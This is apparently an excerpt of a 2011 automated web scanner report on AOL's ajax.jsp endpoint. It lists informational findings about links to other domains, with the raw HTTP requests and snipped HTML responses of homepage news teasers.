<td valign="top" class="e5_content" id="e5_lbl_cho_pay_option"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_currency_option"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td class="e5_outerborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="3" class="e5_outerborder_horizontal"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td class="e5_outerborder_horizontal e5_outerborder_horizontal_next"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td class="e5_outerborder_horizontal" id="e5_lne_res_legal_links1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td class="e5_outerborder_horizontal" id="e5_lne_res_legal_links2"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
20.83. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl7

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc23.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2895
Content-Length: 2895

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl8 plid-51865 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl8_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl8|sec1_lnk1|51865" href="http://www.stylelist.com/2011/03/26/diana-ross/"><img height="217" alt="Diana Ross" width="386" src="http://o.aolcdn.com/hss/storage/adam/90f4062f5bee559ed09b7225af55b16c/Diana-Ross-beauty-W-386cs032511.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl8_hdln" href="http://www.stylelist.com/2011/03/26/diana-ross/" class=" lnid-sec1_lnk2 icid-maing|main5|dl8|sec1_lnk2|51865">Dear Diana: A Letter to a Beauty Icon
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl8_cpy" href="http://www.stylelist.com/2011/03/26/diana-ross/" class=" lnid-sec1_lnk3 icid-maing|main5|dl8|sec1_lnk3|51865">19 gorgeous pics that span decades</a>
...[SNIP]...
<li ><a name="om_dl8_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl8|sec3_lnk1|51865" href="http://www.shelterpop.com/2011/03/25/molly-sims-house/">Peek Inside Molly Sims' House
</a>
...[SNIP]...
<li ><a name="om_dl8_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl8|sec3_lnk2|51865" href="http://www.stylelist.com/2011/03/22/organix-renewing-moroccan-argan-oil-collection-i-tried-it/">'Super-Ingredient' for Your Hair
</a>
...[SNIP]...
<li ><a name="om_dl8_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl8|sec3_lnk3|51865" href="http://www.mydaily.com/2011/03/25/sara-blakeley-invented-spanx-millionaire/">Meet the Woman Behind Spanx
</a>
...[SNIP]...
20.84. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc08.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1140
Content-Length: 1140

<div id="local-module" class="mnid-local plid-51915">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >Local News and Weather</a>
...[SNIP]...
<a href="" name="om_localclose" id="locationclose" class="lnid-sec1_lnk4 sprite"><img src="http://portal.aolcdn.com/p5/_v40.2.0/css/maing.png" alt="Cancel"></a>
...[SNIP]...
20.85. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl8

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc29.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2916
Content-Length: 2916

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl9 plid-51929 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl9_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl9|sec1_lnk1|51929" href="http://autos.aol.com/article/best-financing-deals-of-the-month/"><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/e7f475c943d1c4dc9450c11d386a2dcd/Xterra-PRO-4X--W-386cs032511.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl9_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl9|sec3_lnk1|51929" href="http://translogic.aolautos.com/2010/09/26/one-hit-wonders-great-ideas-bad-cars/">This Was a Good Idea ... in Theory</a>
...[SNIP]...
<li ><a name="om_dl9_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl9|sec3_lnk2|51929" href="http://translogic.aolautos.com/2010/09/28/human-powered-ornithopter-would-make-da-vinci-proud/">Airplane Has Wings That Flap</a>
...[SNIP]...
<li ><a name="om_dl9_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl9|sec3_lnk3|51929" href="http://translogic.aolautos.com/photos/the-best-interiors-of-the-2011-geneva-motor-show/">Car Interior Is Drop-Dead Cool</a>
...[SNIP]...
20.86. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=14&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl13

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:38:36 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc03.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3065
Content-Length: 3065

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl14 plid-51891 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
<a id="dlimg" name="om_dl14_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl14|sec1_lnk1|51891" href="http://realestate.aol.com/blog/gallery/buyers-market-homes-for-sale-under-250k/"><img height="217" alt="Home for sale in Nashville" width="386" src="http://o.aolcdn.com/hss/storage/adam/d9af53a7f5ecca1b148fd33ed8f8e040/buyers-market-nashville-386mz032511.jpg"/></a>
...[SNIP]...
20.87. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc04.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3218
Content-Length: 3218

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-51936 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl2|sec1_lnk1|51936" href="http://www.aolnews.com/2011/03/26/thousands-crowd-central-london-in-budget-protest/"><img height="217" alt="Protestors kick the doors of a branch of Santander on Picadilly" width="386" src="http://o.aolcdn.com/hss/storage/adam/63be7ea898f98696adcd0f7ff6277e46/wsprotest-217cn032611.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl2_hdln" href="http://www.aolnews.com/2011/03/26/thousands-crowd-central-london-in-budget-protest/" class=" lnid-sec1_lnk2 icid-maing|main5|dl2|sec1_lnk2|51936">Protesters Smash Windows in London


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl2_cpy" href="http://www.aolnews.com/2011/03/26/thousands-crowd-central-london-in-budget-protest/" class=" lnid-sec1_lnk3 icid-maing|main5|dl2|sec1_lnk3|51936">Hurled ammonia-filled lightbulbs
</a>
...[SNIP]...
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl2|sec3_lnk1|51936" href="http://www.huffingtonpost.com/2011/03/26/amanda-knox-trial-witness_0_n_840954.html ?utm_source=aolhp&amp;utm_medium=referral&amp;utm_campaign=aolhp2">Conflicting Testimony in Knox Trial
</a>
...[SNIP]...
<li ><a name="om_dl2_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl2|sec3_lnk2|51936" href="http://www.huffingtonpost.com/2011/03/26/air-raids-force-gaddafi-r_n_841030.html ?utm_source=aolhp&amp;utm_medium=referral&amp;utm_campaign=aolhp2">Gadhafi Retreats After Airstrikes

</a>
...[SNIP]...
<li ><a name="om_dl2_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl2|sec3_lnk3|51936" href="http://www.aolnews.com/2011/03/26/winning-mega-millions-ticket-worth-312m-sold-in-ny/">Where $312M Lotto Ticket Was Sold</a>
...[SNIP]...
20.88. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl4

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:56 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc21.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2912
Content-Length: 2912

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl5 plid-51897 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl5|sec1_lnk1|51897" href="http://www.stylelist.com/2011/03/21/how-to-spring-2011-70s-trend"><img height="217" alt="Julie Bowen, Tyra Banks, Eva Longoria" width="386" src="http://o.aolcdn.com/hss/storage/adam/6249d7f2a03b3cfaabc026b617e006c2/70s-disco-trend-celebrities-386kk0324.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" href="http://www.stylelist.com/2011/03/21/how-to-spring-2011-70s-trend" class=" lnid-sec1_lnk2 icid-maing|main5|dl5|sec1_lnk2|51897">'70s Trend Is Making a Comeback
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.stylelist.com/2011/03/21/how-to-spring-2011-70s-trend" class=" lnid-sec1_lnk3 icid-maing|main5|dl5|sec1_lnk3|51897">Pants style is 'extremely flattering'
</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl5|sec3_lnk1|51897" href="http://www.mydaily.com/2011/03/15/how-to-be-a-bombshell/">Woman Turns Into a 'Bombshell'
</a>
...[SNIP]...
<li ><a name="om_dl5_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl5|sec3_lnk2|51897" href="http://www.stylelist.com/2011/03/23/vanessa-hudgens-style-evolution/">Hudgens' Most Memorable Looks
</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl5|sec3_lnk3|51897" href="http://www.stylelist.com/2011/03/24/opi-shatter/">3 New Nail Polish Colors for Spring
</a>
...[SNIP]...
20.89. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl5

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc10.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2982
Content-Length: 2982

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl6 plid-51853 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl6_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl6|sec1_lnk1|51853" href="http://www.aolhealth.com/2011/03/25/the-anti-allergy-diet/"><img height="217" alt="Sunflower Seeds" width="386" src="http://o.aolcdn.com/hss/storage/adam/6593c6b75ca0f1c38a97b5382664e9e4/sunflower-seeds-386ds032511.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl6_hdln" onclick=" " href="http://www.aolhealth.com/2011/03/25/the-anti-allergy-diet/" class=" lnid-sec1_lnk2 icid-maing|main5|dl6|sec1_lnk2|51853">What to Eat on the 'Anti-Allergy Diet'
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl6_cpy" href="http://www.aolhealth.com/2011/03/25/the-anti-allergy-diet/" class=" lnid-sec1_lnk3 icid-maing|main5|dl6|sec1_lnk3|51853">More foods that may fight symptoms
</a>
...[SNIP]...
<li ><a name="om_dl6_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl6|sec3_lnk1|51853" href="http://www.thatsfit.com/2011/03/24/shape-move-of-the-week-how-to-do-tricep-dips/">Move to Get Rid of Flab on Arms
</a>
...[SNIP]...
<li ><a name="om_dl6_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl6|sec3_lnk2|51853" href="http://www.mydaily.com/2011/03/25/the-power-of-names-do-they-really-define-you/">How Your Name Affects Decisions
</a>
...[SNIP]...
<li ><a name="om_dl6_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl6|sec3_lnk3|51853" href="http://www.stylelist.com/2011/03/25/retro-mad-men-eye-makeup/">Easy Way to Do Retro Eye Makeup
</a>
...[SNIP]...
20.90. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=12&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:38:14 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc20.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3069
Content-Length: 3069

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl12 plid-51931 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
<a id="dlimg" name="om_dl12_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl12|sec1_lnk1|51931" href="http://jobs.aol.com/articles/2009/01/26/are-you-a-right-or-left-brain-thinker/"><img height="217" alt="Illustration shows the human brain" width="386" src="http://o.aolcdn.com/hss/storage/adam/26744b24eeffabf7c26f0828b1a44dbc/human-head-with-brain-386mz012511.jpg"/></a>
...[SNIP]...
20.91. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:17 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc11.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3386
Content-Length: 3386

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-51921 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl3_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl3|sec1_lnk1|51921" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-03-26/butler-close-to-again-crashing-final-four-party-ncaa-tournament-2011"><img height="217" alt="Matt Howard #54 of the Butler Bulldogs shoots between Keaton Nankivil #52 and Jon Leuer #30 of the Wisconsin Badgers" width="386" src="http://o.aolcdn.com/hss/storage/adam/e27345727ed9f219a6e15ad457d8ef17/butler-v-wisconsin-217yp-032511.jpg"/></a>
...[SNIP]...
